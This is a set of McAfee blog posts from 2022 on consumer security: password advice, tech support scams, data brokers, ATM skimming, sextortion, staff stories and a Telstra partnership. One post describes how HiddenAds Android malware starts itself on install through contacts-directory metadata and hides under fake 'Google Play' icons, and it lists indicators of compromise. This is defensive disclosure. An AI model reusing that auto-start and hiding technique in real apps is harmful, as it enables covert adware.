When it comes to identity protection software, McAfee provides a proven solution with our identity protection and privacy services. The protection includes alerts if your sensitive information is found on the dark web (up to 10 months sooner than other providers), personal data cleanup from sites gathering and selling your information, and an unlimited virtual public network (VPN) service that protects your privacy as you use public Wi-Fi networks. 

You’ll also get up to $1 million in identity theft coverage and hands-on restoration support to help you reclaim your identity.  

Use complex passwords

Simple, obvious passwords and passcodes (like your street address, your birthday, your kids’ or pets’ names, or “1234” or “abcd”) are easy for cybercriminals to crack, giving them unwanted access to your private data. 

The stronger your password, the better your protection. Some best password practices include: 

  • Use a different password for all your online accounts, including your email accounts, social media platforms, and bank accounts. 
  • Create a password that’s at least eight characters long, combining lowercase and uppercase letters, numbers, and symbols. 
  • Don’t use consecutive keystrokes, such as “qwerty.” 
  • Don’t share your passwords with anyone. 
  • Avoid entering your password on unsecured public Wi-Fi, such as at an airport or in a coffee shop. 

Regularly update passwords

It’s important not to be a standing target. Just as you should use different passwords for everything, you should regularly change your passwords. You should do this a few times a year (although some cyber experts say this might not be necessary if you have a long and very complicated password). 

If you have a number of passwords that you update often, it might be worth getting a password manager like McAfee True Key to keep track of them. Not only will you not be faced with remembering all your different passwords or writing them down (also a no-no), but it can also help you create and store unique passwords 

The software uses the strongest encryption algorithms available to protect your passwords, scrambling them so no one else can access them. It’ll also suggest new passwords and automatically log you into your online accounts with just one master password. 

Use multi-factor authentication

Another important line of defense is multi-factor authentication (sometimes known as two-factor authentication). This system uses a password and a second piece of verification — often an SMS message sent to your Android device or iPhone — to authenticate your identity. 

This provides hard-to-beat protection even if a hacker has your password. Besides receiving SMS codes, there are also code-generating apps and physical security keys. 

Learn to spot potential scams

Thinking before you click on an email or text is a very important defense against phishing scams. Your bank won’t send you an email or text notifying you that there’s been suspicious activity on your account.  

Does getting a large refund from your phone company sound too good to be true? It is. Similarly, the Internal Revenue Service (IRS) won’t text to tell you that you owe them money, and princes aren’t going to give you a fortune out of the blue. 

Internet users beware: If you’re not absolutely certain that the text message you received is from a legitimate and trusted source, delete it. You can always contact the business or person directly to confirm that the message is legit. 

Keep device software up to date

Any operating system or app you use is open to malicious cyberattacks. This is why you should keep all your software up to date with the latest versions. Software developers are continually fixing holes in their products and offering cybersecurity patches to make them as safe and hacker-proof as possible. 

Make sure your software, firmware, and security settings are up to date on your home’s Wi-Fi router, as well. You can often change your settings to allow for automatic updates. 

Be cautious when using public Wi-Fi

Sure, who doesn’t like to go to a cafe, library, or hotel lobby to use the free Wi-Fi? But security is often weak in these public networks. If you open your online banking account or access personal information, you may unwittingly be giving a personal invitation to eavesdropping cybercriminals 

This is where the bank-grade level of protection of McAfee Secure VPN comes in, which automatically turns on when you need it and keeps you safe on public Wi-Fi networks. 

Use encryption

Even if your device does get hacked, you can protect vital information on your Windows or macOS system with an encryption program like BitLocker or FileVault. You can protect any hard drive you use, including portable ones and USB keys. 

It’s also a good idea to only shop at encrypted websites marked with the prefix “HTTPS” in their URLs. 

Discover how McAfee keeps you secure online

One of the best ways to surf the web in comfort while keeping hackers at bay is with the comprehensive solutions provided by McAfee Total Protection. 

Your protection includes proactive measures (meaning we’ll guide you to the best choices for prevention), early detection, and expert identity theft support.  

This means you’ll get identity monitoring, up to $1 million in identity theft coverage, lost wallet protection, premium antivirus software, a secure VPN, and personal data removal. In particular, our Personal Data Cleanup service will help find and remove your personal information from data broker websites and people search sites.  

With McAfee, you don’t have to be afraid of hackers. Let us deal with them.  

The post How to Stay One Step Ahead of Hackers appeared first on McAfee Blog.

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Technical Support Scams – What to look out for

By McAfee Labs — August 2nd 2022 at 23:22

Authored by Oliver Devane

Technical Support Scams have been targeting computer users for many years. Their goal is to make victims believe they have issues needing to be fixed, and then charge exorbitant fees, which unfortunately some victims pay. This blog post covers a number of example actions, that scammers will go through when they are performing their scams. Our goal is to educate consumers on the signs to look out for, and what to do if they believe they are being scammed.

Advertising – The Lure

For a tech support scammer to reach their victims, they need to first find them (or be found by them). One technique we see includes scammers creating Twitter or other social media accounts that post messages claiming to be from the official technical support site. For example, a Twitter account will post a tweet with the hashtags #McAfee and #McAfeeLogin to drive traffic to the tweet and make victims believe the links are legitimate and safe to click.

Scammers behind tech support scams can create very convincing websites which mimic the official ones.

Some fraudulent websites use the McAfee logo or other company logos to try trick individuals. They often invite clicking on a ‘LOGIN’ or ‘ACTIVATE’ link with a similar color scheme to official sites to appear legitimate.

These sites may then ask the victim to enter their real username, password, and phone number. Upon entering these details, websites will usually show an error message to make the victim believe there is an issue with their account.


The error message will usually contain a link that upon clicking will load a chat box where the scammers will initiate a conversation with the victim. At this point, the scammers will have the phone number and email address associated with the victim. They will use this to contact them and make them believe they are an official technical support employee.

Gaining Access

The scammer’s next objective is often to gain access to the victim’s computer. They do this so that they can trick the victim into believing there is an issue with their computer and that they need their support services to fix it.

The scammers will do this by either asking the victim to enter a URL that will result in the download of a remote access tool or by providing them with a link in the chat window if they are still speaking to them on the fake support website.

A remote access tool will enable the scammer to take complete control of the victim’s machine. With this, they will be able to remove or install software, access personal data such as documents and cryptocurrency wallets as well as dump passwords from the web browsers so they can then access all the victim’s accounts.

It is vital to not provide remote access to your computer to unknown and unverified individuals, as there could be a big risk to your personal data. Some examples of remote access tools that have legitimate uses but are often used to perpetrate fraud are:

  • TeamViewer
  • LogMeIn
  • AnyDesk
  • Aweray (Awesun)

Activity once the connection is established

If the scammers are given access to the victim’s machine, they will often make use of the command filename cmd.exe to perform some visual activity on the computer screen which is done to attempt to trick the individual into believing that some malicious activity is occurring on their computer or network. Most people will be unaware of the filename cmd.exe and the actions being used,and thus will be none the wiser to the scammer’s actions.

Here are some examples we have seen scammers use:


Changing the title of cmd.exe to ‘network scanner’ or ‘file scanner’ to make the victim believe they are running a security tool on their machine.

Directory enumeration

Scammers will make use of standard functions within the cmd.exe file, to make their victims believe they are performing lots of activity. One of these functions is ‘dir’ which will  display  all the files for a specific directory. For example, if you have a folder called ‘school work’ and have 2 word documents in there, a ‘dir’ query of that folder will appear like this:

What the scammers will do is make use of ‘dir’ and the title function to make you believe they are scanning your machine. Here is an example of running ‘dir’ on the all the files on a machine with the cmd.exe title set to ‘File Scanner’:


A similar function to ‘dir’ called ‘tree’ may also be used. The ‘tree’ function will display directory paths and will generate lots of events on the screen:

Tech Support Phone Number

Some scammers will also add their phone number to the taskbar of the victim’s machine. They do this by creating a new folder with the phone number as the name and adding it as a toolbar. This is shown in the image below

Software Installation

Scammers may install other software on the victim’s machine or make them believe that they have installed additional software which they will then be charged for.

For example, some scammers may add programs to the desktop of victims which have no purpose, but the scammers insist they are legitimate security tools such as firewalls or network scanners.

Some example filenames are:

  • Firewall security.exe
  • Network firewall.exe
  • Network security.exe
  • Email security.exe
  • Banking security.exe


The scammers will usually perform some activity on your machine before asking for payment. This is done to build confidence in their work and make you believe they have done some activity and therefore deserve some sort of payment. Do not be fooled by scammers who have not performed any useful activity.  As detailed in the previous sections, be careful not to fall victim to fake social media accounts or websites.

Signs to look out for

This section contains a few signs to look out for which may indicate that you are interacting with a scammer.


Some scammers will become rude and very short with you if you start questioning what they are doing. They may say that you are not technical and do not understand what is occurring. This would not be the behavior of a legitimate technical support operative.

Leave the computer on

Scammers will encourage you to leave the machine and remote connection on even if you need to go out and leave it unattended. Do not under any circumstances do this as they would then be free to do any activity they wish on your machine and network.

Created files being detected

Some files added to your machine by the scammer may be detected by the AV security software. They may act like this is an error and the file is innocent. If you have initiated a remote connection and the controller creates a file on your machine which is detected by the security software, we recommend ceasing the interaction as detailed below.

What to do

The following steps should be performed if you believe you are being scammed as part of a tech support scam.

Disconnect the machine from the internet

If the machine is connected via a network cable, the easiest way is to unplug it. If the machine is connected via Wi-Fi, there may be a physical switch that can be used to disconnect it. If there is no physical switch, turn off Wi-Fi through the settings or the computer. It  can be powered down by pressing the power button.

Hang up

Hang up the phone (or end the chat) and do not answer any more calls from that number. The scammer will try to make you believe that the call is legitimate and ask you to reconnect the remote-control software.

Remove the remote-control software

If the scammer was controlling your machine, the remote-control software will need to be removed. If the computer was powered down, it can be powered back up, but if a popup is shown asking for permission to allow remote access, do not grant it.

The remote software can usually be removed by using the control panel and add/remove programs. To do this, press the Windows key and then perform a search for ‘remove’ and click on ‘Add or remove programs’.

Sort the programs by install date as shown below and then remove the remote software by clicking on the ‘Uninstall’ button.  Keep in mind that the software installed on your computer may appear by a different name, but if you look at what was installed on the same day as the scammer initiated the remote control session, you should be able to identify it.

Check the Antivirus Software for any exclusions

Some scammers may add exclusions for the files they create on your computer so that they are not detected by the security software. We recommend checking the exclusions and if any are present which were not added by yourself to remove them.

A guide for McAfee customers is available here

Update Antivirus Software and perform a full scan

After removing any software which was installed, we recommend updating your security software and performing a full scan. This will identify any malicious files created by the scammer such as password stealers and keyloggers.

Change passwords

After performing a full scan, we recommend changing all of your passwords as the scammer may have gathered your credentials while they had access to your computer. It is recommended to do this after performing a full scan as the scammers may have placed a password stealer on the computer and any new passwords you enter may also be stolen.


This blog post contains a number of examples that scammers may use to trick consumers into believing that they may have issues with their devices. If you are experiencing issues with your computer and want to speak to official McAfee support, please reach out via the official channel which is

The McAfee support pages can also be accessed directly via the McAfee Total Protection screen as shown below:

McAfee customers utilizing web protection (including McAfee Web Advisor) are protected from known malicious sites.

The post Technical Support Scams – What to look out for appeared first on McAfee Blog.

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How Data Brokers Sell Your Identity

By McAfee — August 2nd 2022 at 13:44

Our personal and professional lives are becoming increasingly intertwined with the online world. Regular internet usage has made us all prone to cyber-security risks. You leave a digital footprint every time you use the internet, which is a trace of all your online activities.  

When you create new accounts or subscribe to different websites, you give them explicit (or implicit, through their family of apps or subsidiary websites) access to your personal and credit card information. In other cases, websites might track basic information without your knowledge, such as your location and search history. 

There is an industry of data brokers specifically dedicated to keeping track of user data, packaging it, and supplying it to tech companies who use it to run targeted ads and enhance on-platform user experience. Given the widespread use of the internet and exponential improvements in technology, data has become a valuable commodity — creating a need for the sale and purchase of user data.  

This article discusses how data brokers sell your personal information and how you can minimize risk. 

What are data brokers?

Data brokers are companies that aggregate user information from various sources on the internet. They collect, collate, package, and sometimes even analyze this data to create a holistic and coherent version of you online. This data is then supplied to tech companies to fuel their third-party advertising-centered business models.  

Companies interested in buying data include but are not limited to: 


  • Tech platforms 
  • Banks 
  • Insurance companies 
  • Political consultancies 
  • Marketing firms 
  • Retailers 
  • Crime-fighting bureaus 
  • Investigation bureaus 
  • Video streaming service providers 
  • Any other businesses involved in sales  

These companies and social media platforms use your data to better understand target demographics and the content with which they interact. While the practice isn’t unethical in and of itself (personalizing user experiences and creating more convenient UIs are usually cited as the primary reasons for it), it does make your data vulnerable to malicious attacks targeted toward big-tech servers. 

How do data brokers get your information?

Most of your online activities are related. Devices like your phone, laptop, tablets, and even fitness watches are linked to each other. Moreover, you might use one email ID for various accounts and subscriptions. This online interconnectedness makes it easier for data brokers to create a cohesive user profile.  

Mobile phone apps are the most common way for data brokerage firms to collect your data. You might have countless apps for various purposes, such as financial transactions, health and fitness, or social media 

A number of these apps usually fall under the umbrella of the same or subsidiary family of apps, all of which work toward collecting and supplying data to big tech platforms. Programs like Google’s AdSense make it easier for developers to monetize their apps in exchange for the user information they collect.  

Data brokers also collect data points like your home address, full name, Social Security number, phone number, and date of birth. They have automated scraping tools to quickly collect relevant information from public profiles.[Text Wrapping Break] 

Lastly, data brokers can gather data from other third parties that track your cookies or even place trackers or cookies on your browsers. Cookies are small data files that track your online activities when visiting different websites. They track your IP address and browsing history, which third parties can exploit. Cookies are also the reason you see personalized ads and products. 

How data brokers sell your identity 

Data brokers collate your private information into one package and sell it to “people search” websites like Spokeo or TruePeopleSearch. You or a tech business can use these websites to search for people and get extensive consumer data. People search sites also contain public records like voter registration information, marriage records, and birth certificates. This data is used for consumer research and large-scale data analysis.  

Next, marketing and sales firms are some of data brokers’ biggest clients. These companies purchase massive data sets from data brokers to research your data profile. They have advanced algorithms to segregate users into various consumer groups and target you specifically. Their predictive algorithms can suggest personalized ads and products to generate higher lead generation and conversation percentages for their clients.  

Are data brokers legal?

We tend to accept the terms and conditions that various apps ask us to accept without thinking twice or reading the fine print. You probably cannot proceed without letting the app track certain data or giving your personal information. To a certain extent, we trade some of our privacy for convenience. This becomes public information, and apps and data brokers collect, track, and use our data however they please while still complying with the law.  

There is no comprehensive privacy law in the U.S. on a federal level. This allows data brokers to collect personal information and condense it into marketing insights. While not all methods of gathering private data are legal, it is difficult to track the activities of data brokers online (especially on the dark web). As technology advances, there are also easier ways to harvest and exploit data.  

Vermont and California have already enacted laws to regulate the data brokerage industry. In 2018, Vermont passed the country’s first data broker legislation. This requires data brokers to register annually with the Secretary of State and provide information about their data collection activities, opt-out policies, purchaser credentialing practices, and data breaches 

California has passed similar laws to make data brokering a more transparent industry. For risk mitigation of data brokerage, the Federal Trade Commission (FTC) has published reports and provided recommendations to Congress to reduce the engagement of data broker firms. Giving individuals the right to opt-out of the sale of their personal data is a step toward a more rigorous law regarding data privacy 

Can you remove yourself from data broker websites?

Some data brokers let you remove your information from their websites. There are also extensive guides available online that list the method by which you can opt-out of some of the biggest data brokering firms. For example, a guide by Griffin Boyce, the systems administrator at Harvard University’s Berkman Klein Center for Internet and Society, provides detailed information on how to opt-out of a long list of data broker companies. 

Acxiom, LLC is one of the largest data brokering firms and has collected data for approximately 68% of people who have an online presence. You can opt-out of their data collection either through their website or by calling them directly. 

Epsilon Data Management is another big player in the data broker industry that operates as a marketing service and marketing analytics company. You can opt-out of their website through various methods such as by email, phone, and mail. Credit rating agencies like Experian and Equifax are also notorious for collecting your data. Similarly, you can opt-out through their websites or by calling them. 

Keep your personal information secure online with McAfee Total Protection

McAfee is a pioneer in providing online and offline data protection to its customers. We offer numerous cybersecurity services for keeping your information private and secure.  

With regard to data brokers, we enable users to do a personal data clean-up. Cleaning up your personal data online may be a difficult task, as it requires you to reach out to multiple data brokers and opt out. Instead, sign up for McAfee’s Personal Data Cleanup feature to do a convenient and thorough personal data clean-up. We will search for traces of your personal data and assist in getting it removed.  

The post How Data Brokers Sell Your Identity appeared first on McAfee Blog.

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New HiddenAds malware affects 1M+ users and hides on the Google Play Store

By McAfee Labs — July 29th 2022 at 03:32

Authored by Dexter Shin

McAfee’s Mobile Research Team has identified new malware on the Google Play Store. Most of them are disguising themselves as cleaner apps that delete junk files or help optimize their batteries for device management. However, this malware hides and continuously show advertisements to victims. In addition, they run malicious services automatically upon installation without executing the app.

HiddenAds functions and promotion

They exist on Google Play even though they have malicious activities, so the victim can search for the following apps to optimize their device.

Figure 1. Malware on Google Play
Figure 1. Malware on Google Play

Users may generally think installing the app without executing it is safe. But you may have to change your mind because of this malware. When you install this malware on your device, it is executed without interaction and executes a malicious service.

In addition, they try to hide themselves to prevent users from noticing and deleting apps. Change their icon to a Google Play icon that users are familiar with and change its name to ‘Google Play’ or ‘Setting.’

Figure 2. Hide itself by changing icons and names
Figure 2. The Malware hides itself by changing icons and names

Automatically executed services constantly display advertisements to victims in a variety of ways.

Figure 3. A sudden display of advertisements
Figure 3. A sudden display of advertisements

These services also induce users to run an app when they install, uninstall, or update apps on their devices.

Figure 4. A button to induce users to run app

Figure 4. A button to induce users to run app
Figure 4. A button to induce users to run app

To promote these apps to new users, the malware authors created advertising pages on Facebook. Because it is the link to Google Play distributed through legitimate social media, users will download it without a doubt.

Figure 5. Advertising pages on Facebook

Figure 5. Advertising pages on Facebook
Figure 5. Advertising pages on Facebook

How it works

This malware uses the Contact Provider. The Contact Provider is the source of data you see in the device’s contacts application, and you can also access its data in your own application and transfer data between the device and online services. For this, Google provides ContactsContract class. ContactsContract is the contract between the Contacts Provider and applications. In ContactsContract, there is a class called Directory. A Directory represents a contacts corpus and is implemented as a Content Provider with its unique authority. So, developers can use it if they want to implement a custom directory. The Contact Provider can recognize that the app is using a custom directory by checking special metadata in the manifest file.

Figure 6. Content providers declared with special metadata in manifest
Figure 6. Content providers declared with special metadata in manifest

The important thing is the Contact Provider automatically interrogates newly installed or replaced packages. Thus, installing a package containing special metadata will always call the Contact Provider automatically.

The first activity defined in the application tag in the manifest file is executed as soon as you install it just by declaring the metadata. The first activity of this malware will create a permanent malicious service for displaying advertisements.

Figure 7. Create a malicious service for displaying ads
Figure 7. Create a malicious service for displaying ads

In addition, the service process will generate immediately even if it is forced to kill.

Figure 8. Malicious service process that continues to generate
Figure 8. Malicious service process that continues to generate

Next, they change their icons and names using the <activity-alias> tag to hide.

Figure 9. Using <activity-alias> tags to change app icons and names
Figure 9. Using tags to change app icons and names

Users infected worldwide

It is confirmed that users have already installed these apps from 100K to 1M+. Considering that the malware works when it is installed, the installed number is reflected as the victim’s number. According to McAfee telemetry data, this malware and its variants affect a wide range of countries, including South Korea, Japan, and Brazil:

Figure 10. Top affected countries include South Korea, Japan, and Brazil
Figure 10. Top affected countries include South Korea, Japan, and Brazil


This malware is auto-starting malware, so as soon as the users download it from Google Play, they are infected immediately. And it is still constantly developing variants that are published by different developer accounts. Therefore, it is not easy for users to notice this type of malware.

We already disclosed this threat to Google and all reported applications were removed from the Play Store. Also, McAfee Mobile Security detects this threat as Android/HiddenAds and protects you from this type of malware. For more information about McAfee Mobile Security, visit

Indicators of Compromise


App Name Package Name Downloads
Junk Cleaner cn.junk.clean.plp 1M+
EasyCleaner com.easy.clean.ipz 100K+
Power Doctor 500K+
Super Clean com.super.clean.zaz 500K+
Full Clean -Clean Cache org.stemp.fll.clean 1M+
Fingertip Cleaner com.fingertip.clean.cvb 500K+
Quick Cleaner org.qck.cle.oyo 1M+
Keep Clean org.clean.sys.lunch 1M+
Windy Clean 500K+
Carpet Clean og.crp.cln.zda 100K+
Cool Clean 500K+
Strong Clean in.memory.sys.clean 500K+
Meteor Clean org.ssl.wind.clean 100K+



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What is ATM Skimming?

By McAfee — July 22nd 2022 at 13:00

Ever hear of a crime called skimming? It may not be as dramatic a crime as assault or Ponzi schemes, but it can cause significant problems to you as your  savings account can be wiped out in a flash.

Picture a scrawny nerd tampering with an automated teller machine (ATM)—the machine you use with your debit card to get cash. The thief places a device over the slot through which you slide your debit card. You have no idea it’s there. You swipe your card, and the device “skims” or reads your card’s information. In the middle of the night, the thief creeps back, removes the skimming device, downloads your data, burns it to a blank ATM card, makes a fat withdrawal and goes home with the loot. Or they could download your information from the skimmer and then use your information to make online purchases or access your account. Either way, they could clean you out before you wake up next morning!

Now, to be successful, the criminal not only needs a skimming device, they also need to attach a tiny wireless camera to capture your PIN.  These cameras are usually concealed in the lighting fixture above the keypad, in a brochure near the machine, or attached directly to the ATM.

To protect yourself from being skimmed, and generally staying safe when using your debit or credit cards, follow these tips:

  • Scrutinize the ATM. This means every ATM, even ones from your bank. You also want to check any of the card sliders like ones at gas stations, etc, especially if you’re using your debit card. If the scanner does not match the color and style of the machine, it might be a skimmer. You should also “shake”  the card scanner to see if it feels like there’s something  attached to the card reader on the ATM.
  • Cover the keypad when entering your PIN. In order to access your bank accounts, thieves need to have your card number and your PIN. By covering the keypad, you prevent cameras and onlookers from seeing your PIN.
  • Check your bank and credit card statements often. If someone does get your information, you have 60 days to report any fraudulent charges to your credit card company in order not to be charged. For a debit card, you only have about 2 days to report any suspicious activity.
  • Be choosy. Don’t use general ATMs at bars or restaurants. These are not usually monitored and therefore, can be easily tampered with by anyone.

Stay safe from skimming!

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Sextortion: What Your Kids Need to Know

By Toni Birdsong — July 21st 2022 at 21:42

Sextortion is something no parent wants to think could happen to their child, nor a topic most of us would ever imagine we’d need to discuss in our homes. However, according to the latest FBI reports, sextortion is a digital threat to children that, woefully, is on the rise.

According to the FBI, there has been a considerable increase lately in sextortion cases involving children and teens being coerced by adults online.

What is sextortion?

A sextortion scenario can emerge in several ways. Most often, it occurs when an adult (posing as a peer) engages in casual conversation with an underage child, gains their trust through online conversation, then pressures or threatens the child into sharing sexual photos or videos of themselves.

Random contacts

In some cases, the initial contact with the criminal will be a threat. The person may claim to already have a revealing picture or video of a child that they threaten to share if the victim does not send more pictures.

Known contacts

According to the FBI, this crime more often starts when young people believe they are communicating with someone their age who is interested in a relationship or with someone who is offering something of value. This catfish (false profile) relationship usually involves the predator using gifts, money, flattery, lies, or other methods to get a young person to produce an image.

How does sextortion begin?

These dangerous conversations can be initiated through text, a social or chat app, a gaming site, or any number of digital connection points.

After a criminal successfully obtains a photo or video from their victim, the threats can escalate to promises to publish the content or even hurt the child if they don’t send more. This emotionally harrowing situation can ignite shame, fear, and confusion in children who may be too embarrassed to ask for help or report the abuse.

While these criminals rarely request to meet their victims face-to-face, the emotional and physical impact of sextortion can be devastating to a child. According to the FBI, some victims report abusers who become vicious with non-stop harassment and threats. Victims can feel scared, alone, embarrassed, and increasingly desperate. Sadly, as reported in the news, this type of crime can leave some children feeling like they have no way out of the situation.

What can families do?

Talk about the reality of sextortion.

If you are a parent or caregiver, explain to your child how sextortion can happen to anyone online and why it’s important to only connect with known friends and family. Parents: Consider boosting your device security with parental controls that filter content, report your child’s online activity, and reveal potential problems.

Master and repeat the basics.

Some essential safety protocols kids should follow online are worthy of repeating. They are:

1) Make social accounts private, don’t share personal information, and only connect with known friends

2) Ignore and block messages from strangers

3) Keep your guard up. People can pretend to be anyone online, and photos can be altered

4) Be suspect if anyone asks you to message or text with them privately

5) Never share risky photos with anyone online—even a trusted friend

6) Tell someone immediately if someone is threatening you online.

Audit all digital connections.

With your child, go through their apps, social networks, chats, gaming communities, and friend groups and do some editing, defriending, and blocking. Make sure both you and your child know and trust all their online connections. Remember: Open communication and an honest relationship with your child are the most powerful tools you have to keep your child safe online.

Be clear to remove any fault.

A sextortion situation for a child can be incredibly confusing and cause them to isolate and avoid telling anyone about it. Remind and be clear with your child that they would never be in trouble for coming to you with any problem. Let them know that sextortion is a crime for the perpetrator and that they have not broken any laws by sending photos (despite what an abuser might have told them).

Report the crime.

Victims of sextortion should go to a parent or trusted adult and tell them they need help. While doing this can feel terrifying, it’s crucial for victims to know people understand and want to help. For parents and caregivers, contact the FBI at 1-800-CALL-FBI or report the crime online at

While the bad actors online are out to exploit and ruin our digital spaces, it’s important to maintain a healthy perspective rather than responding with fear. Remind your kids that there’s an army of people even more dedicated than the criminals; people like the FBI who are out to stop online crime and keep the internet safe for families. Additionally, as a parent or caregiver, your commitment to helping your family stay informed, equipped, and empowered online is how we all win.

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Kicking off my Second Career: Gayatri’s McAfee Journey

By Life at McAfee — July 21st 2022 at 19:19

Our How I Got Here series spotlights the stories of team members who have successfully grown their career here at McAfee. This journey features Gayatri who kicked off her second career at McAfee after leaving her role and returning to further education.

My McAfee Career Journey

McAfee truly kicked off my second career journey! I previously worked as a Software Engineer before I joined the McAfee Pre-sales Operations team as a summer intern as part of my business graduate program. One thing led to another, and I joined McAfee full-time as a Technical Project Analyst after I graduated later that year!

I’ve always believed in having a growth mindset, I embrace learning and looking for ways to build on my achievements. I’m proud to be part of an organization that nurtures this and helps you pursue your passions. For example, in 2019 I moved from a team focused on products and services for large businesses to a team focused on individual consumers. The needs of consumers versus big businesses are very different, so the business operations work supporting that focus are very different as well. It was a steep learning curve, but I felt supported every step of the way, and since then have grown so much!

Getting outside my comfort zone

Back in 2011, I was a software engineer spending my days doing programming and web development. While I was happy doing that, it was after working on many client-facing projects that I aspired to work at the intersection of business and technology. So, I left engineering and went to business school.

Taking a break from my full-time job to pursue formal business education in a new country was a big step outside my comfort zone. It was challenging to find balance, but the journey was worth it!

Teaming together to see the bigger picture

Today, I am a Sales Enablement and Operations Manager supporting sales teams all over the world. My focus areas include managing platforms and tools like Salesforce, Power BI, and SharePoint Sales Portal, as well as our department’s training and enablement programs – in other words, technology and professional development that help our team members be successful. Plus, I’m a key team member for an array of programs and projects that are pushing the business forward.​​​​​​​​

My work is highly collaborative, and I really enjoy working on projects with colleagues across different departments all over the world. I get to see the bigger picture, better understand the business context, and see the WHY behind the initiatives we drive.​​​​​​​​​​​​​​​​​​​​​

From business projects to being a part of the McAfee WISE (Women in Security) Board, it’s the people, culture, and opportunity that sets McAfee apart. I love working with the amazing people at McAfee!

Underlying it all: Working at McAfee matters because ultimately what we do helps protect lives of millions of people online.

My advice for anyone looking to drive their career forward is:

I have come to realize that the pain of staying the same is greater than the pain of changing and growing. Develop a growth mindset to keep moving forward!

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Don’t Stop Learning! Jeremy’s McAfee Journey

By Life at McAfee — July 12th 2022 at 17:19

Our How I Got Here series spotlights the stories of team members who have successfully grown their careers here at McAfee. This journey features Jeremy whose passion for learning has seen him grow his career in our Technology Services Team.

My McAfee career journey

In 2015, I started as a contract worker to help manage network cabling in McAfee’s buildings. While I was doing that, I was also asked to help manage our voice network (think of this as phones and conference lines) for North and South America. A year after working in both of those roles, I was asked to focus on voice network engineering. After a couple of years, I began training as an engineer for our audio-visual workspace, which helps bring efficiency and centralization to our conference room communications and collaboration tools. And today, I am a Unified Communications Engineer!

My other role within McAfee is Co-President of the McAfee Veterans Community. I absolutely love the community of veterans from around the globe and our community allies. It’s a wonderful group of people who are always willing to serve their local communities. We have hosted inspiring guest speakers, and volunteer events, and continue to hold monthly virtual Coffee Talks and Happy Hours.

A typical day?

I don’t believe that I’ve ever had a typical workday. One moment I’m entering new employees into our systems, and the next I’m providing backend call-center support. I also help run our big Microsoft Teams live events. And, of course, I troubleshoot communications issues as they arise.

I truly enjoy working with the Technology Services team and especially the Voice and Video Team. Being able to collaborate with such wonderful teams is a really rewarding part of my role.

Changing my career

For about a decade in my previous role, I managed a team doing general upkeep in computer systems and I felt really comfortable doing that! I joined McAfee to do a similar role, but shortly afterward I was asked to pivot to more of an engineering role. It was a bit overwhelming at first, but luckily the team I was with was very helpful and supportive of my learning curve. Even though it was out of my comfort zone, I’m so glad I was given the opportunity – it has blessed mine and my family’s life!

​​​​​​​My advice for anyone looking to drive their career forward is

To never stop learning. There is ALWAYS something to learn and someone who can mentor you. I believe that if you are surrounded by smart people (and pay attention), you can’t help but learn and grow! I absolutely love to learn, so this has been one of top of the reasons why I have loved my job since my very first day.

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McAfee and Telstra Partner to Bring Privacy, Identity and Security to Australian Customers

By McAfee — July 11th 2022 at 12:00

McAfee announces a partnership that will grant new and existing Telstra customers easy access to McAfee’s leading security solutions to deliver holistic security and privacy protection through its integrated suite of services including Antivirus, Parental Controls, Identity Protection, Secure VPN and more, to protect and secure multiple devices including mobiles, PCs and laptops. The partnership brings added protection to Telstra’s millions of customers and their devices via McAfee’s intuitive and integrated consumer security platform 

“A recent McAfee study found 27% of Australians surveyed reported attempted account theft and 23% had experienced financial account information leaks,” said Pedro Gutierrez, Senior Vice President of Global Sales and Operations at McAfee. “As the proliferation of life online accelerates, we are thrilled to be partnering with Telstra who are showing through this collaboration, a commitment to innovation and to their customers by investing in new infrastructure and technologies that safeguard their mobile and broadband subscribers. 

McAfee’s integrated consumer security platform offers a wide array of mobile security solutions to protect customers’ privacy and identity while blocking viruses, malware, spyware, and ransomware attacks. This partnership allows Telstra’s customers to take advantage of these capabilities and protect themselves from additional threats including potential hacks, identity theft and broader gaps in online and mobile security so they can live life confidently online.   

“In today’s increasingly connected world the risk of cyber threats continues to grow. To counter the risk, Telstra is committed to providing our customers with the safety and security features needed to protect them online,” said Matthew O’Brien, Cyber Security Executive and Group Owner at Telstra. “This partnership with McAfee helps drive our mission to build a safe and secure connected future where everyone can thrive, and further complements Telstra’s T25 ambition to extend our network leadership position by delivering greater value to our customers.”  

To activate Device Security, Telstra customers can simply go in-store, online or to their MyTelstra app. The full suite of McAfee features supported include Antivirus/System Scan, Safe Browsing, Protection Center, Identity Protection, Password Manager, Parental Controls, Protection Score and Secure VPN. All eligible Telstra customers can try Device Security for three months on Telstra, then auto-roll onto $10/month after. 

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By Life at McAfee — July 5th 2022 at 18:15

In the spirit of #PrideMonth, McAfee hosted month-long celebrations across the world. One of these was a live event hosted by the McAfee Pride Community with a guest speaker from the Resource Center that focused on the history of Pride, support, allyship, and belonging.

We took a moment to ask our event guest speaker, Leslie McMurray, about the work that Resource Center does, the importance of pride, and what companies can do to create inclusive work environments.

Tell us a bit about Resource Center and what you do?

“We like to say, if we had an “elevator pitch”, we would need a really tall building! Resource Center has been around for 39 years and is one of the largest LGBTQIA+ community centers in the United States, it is a primary HIV/AIDS service organization in Texas.

Some of the work that we do includes operating a food pantry and hot meal program that serves low-income people living with HIV. We have a case management department that helps locate resources that we don’t directly provide, like housing. And we have a primary care clinic that is gender-affirming and a ten-chair dental clinic that also serves those living with HIV.

We also have a youth program called Youth First that serves youth from middle-to-high school. We have a behavioral health program and a clinic that does free testing for HIV and STDs along with a mobile health unit that does free testing in outlying areas. Finally, our advocacy department has three full-time employees!

Why it is important to learn about pride?

“Sometimes we get asked “What’s ‘Pride’ about? Why do you need a parade?”

It’s important to understand that LGBTQIA+ people are still working to achieve equal rights – the same as everyone else.

The tipping point of the fight for equal rights in the US dates back to 1969 when the Stonewall Uprising took place in Manhattan. The first Pride march was held a year later to honor the anniversary of the Stonewall Uprising and continues to take place during the month of June each year. And while we appreciate the attention during the month, the continued fight for equal rights for the LGBTQIA+ community is yearly, and we need continuous support and allyship of people and businesses year-round.

So it’s really important for people to learn about diverse populations, understand what their challenges are, and educate yourself on these issues – from that spring’s allies.”

What should companies do to create inclusive work environments

“One of the simplest things for companies to do is to include ‘Sexual Orientation, Gender Identity and Gender expression’ in your Equal Employment Opportunity statement. Other things companies can do is to look at putting a policy in place for transgender employees who are transitioning and consider including transgender healthcare in your company benefits package.

Make sure to help foster understanding by getting employees to do training with organizations like Resource Center. And empower upper management to lead the way ensuring all employees can bring their whole selves to work. Finally, when the opportunity arises look at working with and bringing in non-profit organizations into your company to continue spreading awareness and support for the LGBTQIA+ community.

And while June wraps up Pride month, year-round we work towards a workplace and community where all can belong – a workplace where our unique differences are celebrated and where we all stand together for equality. #McAfeePride

Learn more about the incredible work that Resource Center does here

